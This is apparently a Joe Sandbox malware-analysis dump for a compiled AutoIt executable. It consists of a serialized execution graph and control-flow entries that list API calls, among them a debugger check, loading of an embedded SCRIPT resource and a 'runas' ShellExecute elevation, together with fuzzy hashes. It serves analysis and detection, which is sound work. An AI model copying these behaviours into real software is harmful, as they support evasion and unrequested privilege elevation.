97740->97741 97742 684717 97741->97742 97743 6877c7 59 API calls 97742->97743 97744 68471f 97743->97744 97745 6877c7 59 API calls 97744->97745 97746 684727 97745->97746 97747 6bd8fb 97746->97747 97748 68475b 97746->97748 97749 6881a7 59 API calls 97747->97749 97750 6879ab 59 API calls 97748->97750 97751 6bd904 97749->97751 97752 684769 97750->97752 98184 687eec 97751->98184 97754 687e8c 59 API calls 97752->97754 97755 684773 97754->97755 97756 68479e 97755->97756 97757 6879ab 59 API calls 97755->97757 97759 6847bd 97756->97759 97760 6bd924 97756->97760 97773 6847de 97756->97773 97761 684794 97757->97761 97762 687b52 59 API calls 97759->97762 97764 6bd9f4 97760->97764 97774 6bd9dd 97760->97774 97782 6bd95b 97760->97782 97765 687e8c 59 API calls 97761->97765 97766 6847c7 97762->97766 97763 6847ef 97767 684801 97763->97767 97769 6881a7 59 API calls 97763->97769 97768 687d2c 59 API calls 97764->97768 97765->97756 97771 6879ab 59 API calls 97766->97771 97766->97773 97770 684811 97767->97770 97772 6881a7 59 API calls 97767->97772 97784 6bd9b1 97768->97784 97769->97767 97775 6881a7 59 API calls 97770->97775 97777 684818 97770->97777 97771->97773 97772->97770 98171 6879ab 97773->98171 97774->97764 97779 6bd9c8 97774->97779 97775->97777 97776 6881a7 59 API calls 97786 68481f Mailbox 97776->97786 97777->97776 97777->97786 97778 6bd9b9 97780 687d2c 59 API calls 97778->97780 97781 687d2c 59 API calls 97779->97781 97780->97784 97781->97784 97782->97778 97787 6bd9a4 97782->97787 97783 687b52 59 API calls 97783->97784 97784->97773 97784->97783 98188 687a84 59 API calls 2 library calls 97784->98188 97786->97667 97788 687d2c 59 API calls 97787->97788 97788->97784 97790 687faf 59 API calls 97789->97790 97791 687b5d 97790->97791 97791->97672 97791->97674 97793 687ca0 97792->97793 97794 6bf094 97792->97794 98190 687bb1 97793->98190 98196 6d8123 59 API calls _memmove 97794->98196 97797 687cac 97797->97682 97798 6bf09e 97799 6881a7 59 API calls 97798->97799 97800 6bf0a6 Mailbox 
97799->97800 97802 6e42c9 97801->97802 97803 6e42ce 97802->97803 97804 6e42dc 97802->97804 97805 6881a7 59 API calls 97803->97805 97806 6877c7 59 API calls 97804->97806 97854 6e42d7 Mailbox 97805->97854 97807 6e42e4 97806->97807 97808 6877c7 59 API calls 97807->97808 97809 6e42ec 97808->97809 97810 6877c7 59 API calls 97809->97810 97811 6e42f7 97810->97811 97812 6877c7 59 API calls 97811->97812 97813 6e42ff 97812->97813 97814 6877c7 59 API calls 97813->97814 97815 6e4307 97814->97815 97816 6877c7 59 API calls 97815->97816 97817 6e430f 97816->97817 97818 6877c7 59 API calls 97817->97818 97819 6e4317 97818->97819 97820 6877c7 59 API calls 97819->97820 97821 6e431f 97820->97821 97822 6846f9 59 API calls 97821->97822 97823 6e4336 97822->97823 97824 6846f9 59 API calls 97823->97824 97825 6e434f 97824->97825 97826 687b52 59 API calls 97825->97826 97827 6e435b 97826->97827 97828 6e436e 97827->97828 97829 687e8c 59 API calls 97827->97829 97830 687b52 59 API calls 97828->97830 97829->97828 97831 6e4377 97830->97831 97832 6e4387 97831->97832 97834 687e8c 59 API calls 97831->97834 97833 6881a7 59 API calls 97832->97833 97835 6e4393 97833->97835 97834->97832 97836 687c8e 59 API calls 97835->97836 97837 6e439f 97836->97837 98197 6e445f 59 API calls 97837->98197 97839 6e43ae 98198 6e445f 59 API calls 97839->98198 97841 6e43c1 97842 687b52 59 API calls 97841->97842 97843 6e43cb 97842->97843 97844 6e43e2 97843->97844 97845 6e43d0 97843->97845 97847 687b52 59 API calls 97844->97847 97846 687e0b 59 API calls 97845->97846 97849 6e43dd 97846->97849 97848 6e43eb 97847->97848 97850 6e4409 97848->97850 97851 687e0b 59 API calls 97848->97851 97852 687c8e 59 API calls 97849->97852 97853 687c8e 59 API calls 97850->97853 97851->97849 97852->97850 97853->97854 97854->97690 97856 6e93ec __write_nolock 97855->97856 97857 6a0ff6 Mailbox 59 API calls 97856->97857 97858 6e9449 97857->97858 97859 68538e 59 API calls 97858->97859 97860 6e9453 97859->97860 97861 6e91e9 GetSystemTimeAsFileTime 
97860->97861 97862 6e945e 97861->97862 97863 685045 85 API calls 97862->97863 97864 6e9471 _wcscmp 97863->97864 97865 6e9495 97864->97865 97866 6e9542 97864->97866 98229 6e99be 97865->98229 97868 6e99be 96 API calls 97866->97868 97883 6e950e _wcscat 97868->97883 97871 68506b 74 API calls 97872 6e9567 97871->97872 97874 68506b 74 API calls 97872->97874 97873 6e954b 97873->97697 97876 6e9577 97874->97876 97875 6e94c3 _wcscat _wcscpy 98236 6a432e 58 API calls __wsplitpath_helper 97875->98236 97877 68506b 74 API calls 97876->97877 97879 6e9592 97877->97879 97880 68506b 74 API calls 97879->97880 97881 6e95a2 97880->97881 97882 68506b 74 API calls 97881->97882 97884 6e95bd 97882->97884 97883->97871 97883->97873 97885 68506b 74 API calls 97884->97885 97886 6e95cd 97885->97886 97887 68506b 74 API calls 97886->97887 97888 6e95dd 97887->97888 97889 68506b 74 API calls 97888->97889 97890 6e95ed 97889->97890 98199 6e9b6d GetTempPathW GetTempFileNameW 97890->98199 97892 6e95f9 97893 6a548b 115 API calls 97892->97893 97904 6e960a 97893->97904 97894 6e96c4 98213 6a55d6 97894->98213 97896 6e96cf 97898 6e96e9 97896->97898 97899 6e96d5 DeleteFileW 97896->97899 97897 68506b 74 API calls 97897->97904 97900 6e978f CopyFileW 97898->97900 97905 6e96f3 _wcsncpy 97898->97905 97899->97873 97901 6e97b7 DeleteFileW 97900->97901 97902 6e97a5 DeleteFileW 97900->97902 98226 6e9b2c CreateFileW 97901->98226 97902->97873 97904->97873 97904->97894 97904->97897 98200 6a4a93 97904->98200 98237 6e8d90 97905->98237 97910->97623 97912 687e1f 97911->97912 97913 6bf173 97911->97913 98559 687db0 97912->98559 97915 688189 59 API calls 97913->97915 97917 6bf17e __wsetenvp _memmove 97915->97917 97916 687e2a 97916->97656 97918->97660 97919->97673 97969 684d61 97920->97969 97923 684d3a 97925 684d4a FreeLibrary 97923->97925 97926 684d53 97923->97926 97924 684d61 2 API calls 97924->97923 97925->97926 97927 6a548b 97926->97927 97973 6a54a0 97927->97973 97929 684f5c 97929->97719 97929->97720 98073 684d94 
97930->98073 97933 684d94 2 API calls 97936 684ced 97933->97936 97934 684d08 97937 684dd0 97934->97937 97935 684cff FreeLibrary 97935->97934 97936->97934 97936->97935 97938 6a0ff6 Mailbox 59 API calls 97937->97938 97939 684de5 97938->97939 98077 68538e 97939->98077 97941 684df1 _memmove 97942 684e2c 97941->97942 97943 684ee9 97941->97943 97944 684f21 97941->97944 97945 685027 69 API calls 97942->97945 98080 684fe9 CreateStreamOnHGlobal 97943->98080 98091 6e9ba5 95 API calls 97944->98091 97950 684e35 97945->97950 97948 68506b 74 API calls 97948->97950 97950->97948 97951 6bdcd0 97950->97951 97955 684ec9 97950->97955 98086 685045 97950->98086 97952 685045 85 API calls 97951->97952 97953 6bdce4 97952->97953 97954 68506b 74 API calls 97953->97954 97954->97955 97955->97728 97957 68507d 97956->97957 97958 6bddf6 97956->97958 98115 6a5812 97957->98115 97961 6e9393 98148 6e91e9 97961->98148 97963 6e93a9 97963->97735 97965 6bddb9 97964->97965 97966 685036 97964->97966 98153 6a5e90 97966->98153 97968 68503e 97970 684d2e 97969->97970 97971 684d6a LoadLibraryA 97969->97971 97970->97923 97970->97924 97971->97970 97972 684d7b GetProcAddress 97971->97972 97972->97970 97975 6a54ac __freefls@4 97973->97975 97974 6a54bf 98022 6a8d68 58 API calls __getptd_noexit 97974->98022 97975->97974 97977 6a54f0 97975->97977 97992 6b0738 97977->97992 97978 6a54c4 98023 6a8ff6 9 API calls __vswprintf_l 97978->98023 97981 6a54f5 97982 6a550b 97981->97982 97983 6a54fe 97981->97983 97985 6a5535 97982->97985 97986 6a5515 97982->97986 98024 6a8d68 58 API calls __getptd_noexit 97983->98024 98007 6b0857 97985->98007 98025 6a8d68 58 API calls __getptd_noexit 97986->98025 97987 6a54cf @_EH4_CallFilterFunc@8 __freefls@4 97987->97929 97993 6b0744 __freefls@4 97992->97993 98027 6a9e4b 97993->98027 97995 6b07cd 98063 6a8a5d 58 API calls 2 library calls 97995->98063 97998 6b07d4 98005 6b07c6 97998->98005 98064 6aa06b InitializeCriticalSectionAndSpinCount 97998->98064 97999 6b0843 __freefls@4 97999->97981 98000 
6b0752 98000->97995 98000->98005 98037 6a9ed3 98000->98037 98061 6a6e8d 59 API calls __lock 98000->98061 98062 6a6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98000->98062 98004 6b07fa EnterCriticalSection 98004->98005 98034 6b084e 98005->98034 98008 6b0877 __wopenfile 98007->98008 98009 6b0891 98008->98009 98021 6b0a4c 98008->98021 98070 6a3a0b 60 API calls 2 library calls 98008->98070 98068 6a8d68 58 API calls __getptd_noexit 98009->98068 98011 6b0896 98069 6a8ff6 9 API calls __vswprintf_l 98011->98069 98013 6b0aaf 98065 6b87f1 98013->98065 98015 6a5540 98026 6a5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98015->98026 98017 6b0a45 98017->98021 98071 6a3a0b 60 API calls 2 library calls 98017->98071 98019 6b0a64 98019->98021 98072 6a3a0b 60 API calls 2 library calls 98019->98072 98021->98009 98021->98013 98022->97978 98023->97987 98024->97987 98025->97987 98026->97987 98028 6a9e6f EnterCriticalSection 98027->98028 98029 6a9e5c 98027->98029 98028->98000 98030 6a9ed3 __mtinitlocknum 57 API calls 98029->98030 98031 6a9e62 98030->98031 98031->98028 98032 6a32f5 __lock 57 API calls 98031->98032 98033 6a9e6e 98032->98033 98033->98028 98035 6a9fb5 _doexit LeaveCriticalSection 98034->98035 98036 6b0855 98035->98036 98036->97999 98038 6a9edf __freefls@4 98037->98038 98039 6a9ee8 98038->98039 98040 6a9f00 98038->98040 98041 6aa3ab __FF_MSGBANNER 58 API calls 98039->98041 98043 6a8a5d __malloc_crt 58 API calls 98040->98043 98044 6a9f21 __freefls@4 98040->98044 98042 6a9eed 98041->98042 98045 6aa408 __NMSG_WRITE 58 API calls 98042->98045 98046 6a9f15 98043->98046 98044->98000 98047 6a9ef4 98045->98047 98048 6a9f2b 98046->98048 98049 6a9f1c 98046->98049 98051 6a32df __mtinitlocknum GetModuleHandleExW GetProcAddress ExitProcess 98047->98051 98050 6a9e4b __lock 58 API calls 98048->98050 98052 6a8d68 __vswprintf_l 58 API calls 98049->98052 98053 6a9f32 98050->98053 98054 6a9efe 98051->98054 98052->98044 98055 6a9f3f 98053->98055 98056 6a9f57 98053->98056 
98054->98040 98057 6aa06b __mtinitlocknum InitializeCriticalSectionAndSpinCount 98055->98057 98058 6a2f95 _free 58 API calls 98056->98058 98059 6a9f4b 98057->98059 98058->98059 98060 6a9f73 __mtinitlocknum LeaveCriticalSection 98059->98060 98060->98044 98061->98000 98062->98000 98063->97998 98064->98004 98066 6b7fd5 __wsopen_helper 109 API calls 98065->98066 98067 6b880a 98066->98067 98067->98015 98068->98011 98069->98015 98070->98017 98071->98019 98072->98021 98074 684ce1 98073->98074 98075 684d9d LoadLibraryA 98073->98075 98074->97933 98074->97936 98075->98074 98076 684dae GetProcAddress 98075->98076 98076->98074 98078 6a0ff6 Mailbox 59 API calls 98077->98078 98079 6853a0 98078->98079 98079->97941 98081 685003 FindResourceExW 98080->98081 98085 685020 98080->98085 98082 6bdd5c LoadResource 98081->98082 98081->98085 98083 6bdd71 SizeofResource 98082->98083 98082->98085 98084 6bdd85 LockResource 98083->98084 98083->98085 98084->98085 98085->97942 98087 685054 98086->98087 98088 6bddd4 98086->98088 98092 6a5a7d 98087->98092 98090 685062 98090->97950 98091->97942 98096 6a5a89 __freefls@4 98092->98096 98093 6a5a9b 98105 6a8d68 58 API calls __getptd_noexit 98093->98105 98095 6a5ac1 98107 6a6e4e 98095->98107 98096->98093 98096->98095 98098 6a5aa0 98106 6a8ff6 9 API calls __vswprintf_l 98098->98106 98102 6a5ad6 98114 6a5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98102->98114 98103 6a5aab __freefls@4 98103->98090 98105->98098 98106->98103 98108 6a6e5e 98107->98108 98109 6a6e80 EnterCriticalSection 98107->98109 98108->98109 98110 6a6e66 98108->98110 98111 6a5ac7 98109->98111 98112 6a9e4b __lock 58 API calls 98110->98112 98113 6a59ee 83 API calls 5 library calls 98111->98113 98112->98111 98113->98102 98114->98103 98118 6a582d 98115->98118 98117 68508e 98117->97961 98119 6a5839 __freefls@4 98118->98119 98120 6a584f _memset 98119->98120 98121 6a587c 98119->98121 98122 6a5874 __freefls@4 98119->98122 98145 6a8d68 58 API calls __getptd_noexit 98120->98145 98123 
6a6e4e __lock_file 59 API calls 98121->98123 98122->98117 98125 6a5882 98123->98125 98131 6a564d 98125->98131 98126 6a5869 98146 6a8ff6 9 API calls __vswprintf_l 98126->98146 98132 6a5683 98131->98132 98135 6a5668 _memset 98131->98135 98147 6a58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98132->98147 98133 6a5673 98134 6a8d68 __vswprintf_l 58 API calls 98133->98134 98144 6a5678 98134->98144 98135->98132 98135->98133 98142 6a56c3 98135->98142 98136 6a8ff6 __vswprintf_l 9 API calls 98136->98132 98137 6b0df7 __filbuf 72 API calls 98137->98142 98138 6a57d4 _memset 98141 6a8d68 __vswprintf_l 58 API calls 98138->98141 98139 6b0f18 _memcpy_s 58 API calls 98139->98142 98140 6a4916 _fprintf 58 API calls 98140->98142 98141->98144 98142->98132 98142->98137 98142->98138 98142->98139 98142->98140 98143 6b10ab __read_nolock 70 API calls 98142->98143 98143->98142 98144->98136 98145->98126 98146->98122 98147->98122 98151 6a543a GetSystemTimeAsFileTime 98148->98151 98150 6e91f8 98150->97963 98152 6a5468 __aulldiv 98151->98152 98152->98150 98154 6a5e9c __freefls@4 98153->98154 98155 6a5eae 98154->98155 98156 6a5ec3 98154->98156 98167 6a8d68 58 API calls __getptd_noexit 98155->98167 98158 6a6e4e __lock_file 59 API calls 98156->98158 98160 6a5ec9 98158->98160 98159 6a5eb3 98168 6a8ff6 9 API calls __vswprintf_l 98159->98168 98169 6a5b00 67 API calls 6 library calls 98160->98169 98163 6a5ed4 98170 6a5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 98163->98170 98165 6a5ee6 98166 6a5ebe __freefls@4 98165->98166 98166->97968 98167->98159 98168->98166 98169->98163 98170->98165 98172 6879ba 98171->98172 98173 687a17 98171->98173 98172->98173 98175 6879c5 98172->98175 98174 687e8c 59 API calls 98173->98174 98181 6879e8 _memmove 98174->98181 98176 6879e0 98175->98176 98177 6bef32 98175->98177 98189 688087 59 API calls Mailbox 98176->98189 98178 688189 59 API calls 98177->98178 98180 6bef3c 98178->98180 98182 6a0ff6 Mailbox 59 API calls 98180->98182 98181->97763 98183 6bef5c 
98182->98183 98185 687f06 98184->98185 98187 687ef9 98184->98187 98186 6a0ff6 Mailbox 59 API calls 98185->98186 98186->98187 98187->97756 98188->97784 98189->98181 98191 687bbf 98190->98191 98195 687be5 _memmove 98190->98195 98192 6a0ff6 Mailbox 59 API calls 98191->98192 98191->98195 98193 687c34 98192->98193 98194 6a0ff6 Mailbox 59 API calls 98193->98194 98194->98195 98195->97797 98196->97798 98197->97839 98198->97841 98199->97892 98201 6a4a9f __freefls@4 98200->98201 98202 6a4abd 98201->98202 98203 6a4ad5 98201->98203 98205 6a4acd __freefls@4 98201->98205 98280 6a8d68 58 API calls __getptd_noexit 98202->98280 98206 6a6e4e __lock_file 59 API calls 98203->98206 98205->97904 98208 6a4adb 98206->98208 98207 6a4ac2 98281 6a8ff6 9 API calls __vswprintf_l 98207->98281 98268 6a493a 98208->98268 98214 6a55e2 __freefls@4 98213->98214 98215 6a560e 98214->98215 98216 6a55f6 98214->98216 98218 6a6e4e __lock_file 59 API calls 98215->98218 98223 6a5606 __freefls@4 98215->98223 98427 6a8d68 58 API calls __getptd_noexit 98216->98427 98220 6a5620 98218->98220 98219 6a55fb 98428 6a8ff6 9 API calls __vswprintf_l 98219->98428 98411 6a556a 98220->98411 98223->97896 98227 6e9b68 98226->98227 98227->97873 98230 6e99d2 __tzset_nolock _wcscmp 98229->98230 98231 68506b 74 API calls 98230->98231 98232 6e949a 98230->98232 98233 6e9393 GetSystemTimeAsFileTime 98230->98233 98234 685045 85 API calls 98230->98234 98231->98230 98232->97873 98235 6a432e 58 API calls __wsplitpath_helper 98232->98235 98233->98230 98234->98230 98235->97875 98236->97883 98238 6e8da9 98237->98238 98239 6e8d9b 98237->98239 98270 6a4949 98268->98270 98277 6a4967 98268->98277 98269 6a4957 98318 6a8d68 58 API calls __getptd_noexit 98269->98318 98270->98269 98272 6a4981 _memmove 98270->98272 98270->98277 98272->98277 98283 6a4916 98272->98283 98290 6adac6 98272->98290 98320 6a4c6d 98272->98320 98326 6ab05e 78 API calls 7 library calls 98272->98326 98273 6a495c 98319 6a8ff6 9 API calls __vswprintf_l 98273->98319 98282 6a4b0d 
[Execution Graph: serialized call-graph data, not rendered here. The raw span consisted of node identifiers, function addresses (e.g. 6a4920, 6fdab9, 683b4c), inferred CRT symbol names (e.g. __wsetenvp, _memmove, __cinit, __getptd_noexit, std::exception::_Copy_str) and edges of the form `98277->98282`, plus "N API calls" summaries for collapsed subgraphs. The Windows APIs reachable through the graph include debugger and timing checks (IsDebuggerPresent, OutputDebugString via GetLastError, timeGetTime, QueryPerformanceCounter/QueryPerformanceFrequency, Sleep), process and memory operations (GetPEB, VirtualAlloc, HeapAlloc, GetCurrentProcess/TerminateProcess, CreateThread, WaitForSingleObject, GetExitCodeProcess), CRT start-up (GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, TlsAlloc, EncodePointer/DecodePointer, SetUnhandledExceptionFilter), registry access (RegOpenKeyExW, RegQueryValueExW, RegCloseKey), file system (FindFirstFileW/FindClose, GetFullPathNameW, GetLongPathNameW, GetModuleFileNameW, ReadFile, SetFilePointerEx, GetOpenFileNameW, SetCurrentDirectoryW), COM/OLE (CoInitialize, OleInitialize, CoCreateInstance, CLSIDFromProgID, ProgIDFromCLSID, IIDFromString, LoadTypeLibEx, RegisterTypeLib, VariantInit/VariantClear, SetErrorMode, GetProcAddress) and UI/message-loop calls (PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, IsDialogMessageW, TranslateAcceleratorW, Shell_NotifyIconW, SetTimer/KillTimer, CreatePopupMenu, MessageBoxA, SystemParametersInfoW, IsThemeActive, PostQuitMessage, DefWindowProcW).]
100072->100073 100074 695c05 100073->100074 100074->100035 100075->100061 100077 681016 100082 684ad2 100077->100082 100080 6a2f80 __cinit 67 API calls 100081 681025 100080->100081 100083 6a0ff6 Mailbox 59 API calls 100082->100083 100084 684ada 100083->100084 100085 68101b 100084->100085 100089 684a94 100084->100089 100085->100080 100090 684a9d 100089->100090 100091 684aaf 100089->100091 100092 6a2f80 __cinit 67 API calls 100090->100092 100093 684afe 100091->100093 100092->100091 100094 6877c7 59 API calls 100093->100094 100095 684b16 GetVersionExW 100094->100095 100096 687d2c 59 API calls 100095->100096 100097 684b59 100096->100097 100098 687e8c 59 API calls 100097->100098 100103 684b86 100097->100103 100099 684b7a 100098->100099 100100 687886 59 API calls 100099->100100 100100->100103 100101 684bf1 GetCurrentProcess IsWow64Process 100102 684c0a 100101->100102 100105 684c89 GetSystemInfo 100102->100105 100106 684c20 100102->100106 100103->100101 100104 6bdc8d 100103->100104 100107 684c56 100105->100107 100117 684c95 100106->100117 100107->100085 100110 684c7d GetSystemInfo 100113 684c47 100110->100113 100111 684c32 100112 684c95 2 API calls 100111->100112 100114 684c3a GetNativeSystemInfo 100112->100114 100113->100107 100115 684c4d FreeLibrary 100113->100115 100114->100113 100115->100107 100118 684c2e 100117->100118 100119 684c9e LoadLibraryA 100117->100119 100118->100110 100118->100111 100119->100118 100120 684caf GetProcAddress 100119->100120 100120->100118

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00683B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00683B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,007462F8,007462E0,?,?), ref: 00683BFD
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                      • Part of subcall function 00690A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00683C26,007462F8,?,?,?), ref: 00690ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00683C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007393F0,00000010), ref: 006BD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,007462F8,?,?,?), ref: 006BD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00735D40,007462F8,?,?,?), ref: 006BD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 006BD581
                      • Part of subcall function 00683A58: GetSysColorBrush.USER32(0000000F), ref: 00683A62
                      • Part of subcall function 00683A58: LoadCursorW.USER32(00000000,00007F00), ref: 00683A71
                      • Part of subcall function 00683A58: LoadIconW.USER32(00000063), ref: 00683A88
                      • Part of subcall function 00683A58: LoadIconW.USER32(000000A4), ref: 00683A9A
                      • Part of subcall function 00683A58: LoadIconW.USER32(000000A2), ref: 00683AAC
                      • Part of subcall function 00683A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00683AD2
                      • Part of subcall function 00683A58: RegisterClassExW.USER32(?), ref: 00683B28
                      • Part of subcall function 006839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00683A15
                      • Part of subcall function 006839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00683A36
                      • Part of subcall function 006839E7: ShowWindow.USER32(00000000,?,?), ref: 00683A4A
                      • Part of subcall function 006839E7: ShowWindow.USER32(00000000,?,?), ref: 00683A53
                      • Part of subcall function 006843DB: _memset.LIBCMT ref: 00684401
                      • Part of subcall function 006843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006844A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas$%q
                    • API String ID: 529118366-2403565919
                    • Opcode ID: a95ffdfc68c8becb3d74f2d00c296798efac4202dedceab924dce2b4c1ebd87a
                    • Instruction ID: f513c5506ebb34928f6ffd493b841b4ca82a517e734376975e23159baeba31eb
                    • Opcode Fuzzy Hash: a95ffdfc68c8becb3d74f2d00c296798efac4202dedceab924dce2b4c1ebd87a
                    • Instruction Fuzzy Hash: 71511BB5904248BFCF11FBB4DC05DED7B76BB06700F008279F41166252DBB88646CB2A

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00684EEE,?,?,00000000,00000000), ref: 00684FF9
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00684EEE,?,?,00000000,00000000), ref: 00685010
                    • LoadResource.KERNEL32(?,00000000,?,?,00684EEE,?,?,00000000,00000000,?,?,?,?,?,?,00684F8F), ref: 006BDD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00684EEE,?,?,00000000,00000000,?,?,?,?,?,?,00684F8F), ref: 006BDD75
                    • LockResource.KERNEL32(Nh,?,?,00684EEE,?,?,00000000,00000000,?,?,?,?,?,?,00684F8F,00000000), ref: 006BDD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                    • String ID: SCRIPT$Nh
                    • API String ID: 3051347437-2706064246
                    • Opcode ID: c0cbeffe2810abed5d54b743a3439c0c3a866b6109ad1c1c61271b4e5c5a2515
                    • Instruction ID: 00e7d7649cd87b275f313af2876a693dfac5255455a0591d16a06e7901f0e627
                    • Opcode Fuzzy Hash: c0cbeffe2810abed5d54b743a3439c0c3a866b6109ad1c1c61271b4e5c5a2515
                    • Instruction Fuzzy Hash: 00115AB5200700AFD7319B65DC58FAB7BBAEBC9B51F208268F506D66A0DB61E8008760

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00684B2B
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • GetCurrentProcess.KERNEL32(?,0070FAEC,00000000,00000000,?), ref: 00684BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00684BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00684C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00684C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00684C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00684C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 344e19792683dfc730e3a29c837f570fe01b12eeaf03fb0298c6fa7c29e0e28d
                    • Instruction ID: ad15b111e6bf7225594f93055d43c46122552c62fffd80dda98da7f74d756b65
                    • Opcode Fuzzy Hash: 344e19792683dfc730e3a29c837f570fe01b12eeaf03fb0298c6fa7c29e0e28d
                    • Instruction Fuzzy Hash: DB91D57154A7C5DEC731DB6884511EAFFEAAF2A300B484E9ED0CB87B01DA64E948C71D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006DDAC5
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006DDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006DDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006DDB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,q$DllGetClassObject
                    • API String ID: 753597075-1480125929
                    • Opcode ID: d18bdb28dafabb330970b27ce0b0b7aae975881343251c94bfa35b77bdeb81ac
                    • Instruction ID: 3f14f98db517bf8aea9f2c76a6f6edc879c1faf40fa8bbe7eae4cf9e9f28d058
                    • Opcode Fuzzy Hash: d18bdb28dafabb330970b27ce0b0b7aae975881343251c94bfa35b77bdeb81ac
                    • Instruction Fuzzy Hash: 01417FB1A00208EFDB15DF54C884A9A7BAAEF44314F1581AFED059F346D7B5DD44CBA0
                    Strings
                    Memory Dump Source
